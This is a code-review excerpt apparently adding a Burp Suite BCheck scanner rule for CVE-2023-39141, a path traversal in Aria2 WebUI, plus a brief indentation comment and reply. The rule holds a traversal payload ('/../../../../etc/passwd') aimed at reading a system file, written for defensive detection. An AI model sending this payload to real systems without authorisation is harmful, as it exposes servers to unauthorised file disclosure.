vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck

```diff
@@ -0,0 +1,27 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2023-39141 Aria2 WebUI - Path Traversal"
+    description: "Check for CVE-2023-39141"
+    author: "Joao Paulo Assis (j0hnZ3RA)"
+    tags: "CVE-2023-39141","lfi","unauth","aria2","webui"
+
+define:
+    base_path = "/"
+    potential_path = "/../../../../etc/passwd"
+
+given host then
+    send request called check1:
+        method: "GET"
+        path: {base_path}
+
+    send request called check2:
+        method: "GET"
+        path: {potential_path}
+
+    if "Aria2 WebUI" in {check1.response.body} and {check2.response.status_code} is "200" and "root" in {check2.response.body} then
```

Comment:
A very small thing, but could you indent this block?

Reply:
Done!